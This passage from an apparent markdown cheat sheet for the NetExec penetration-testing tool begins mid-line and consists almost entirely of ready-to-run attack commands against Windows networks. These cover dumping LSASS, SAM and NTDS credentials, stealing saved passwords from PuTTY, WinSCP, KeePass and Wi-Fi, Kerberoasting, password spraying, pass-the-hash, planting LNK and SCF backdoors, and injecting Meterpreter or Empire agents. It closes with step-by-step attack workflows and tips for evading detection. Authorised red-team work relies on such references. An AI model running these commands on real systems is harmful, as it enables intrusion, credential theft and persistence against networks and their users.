user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # 
DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M 
runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac                       # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic 
Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 
192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user 
details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u 
users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc 
mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M 
link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## 
NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               # Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user 
-p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access 
NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                              # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. 
Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use 
`cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}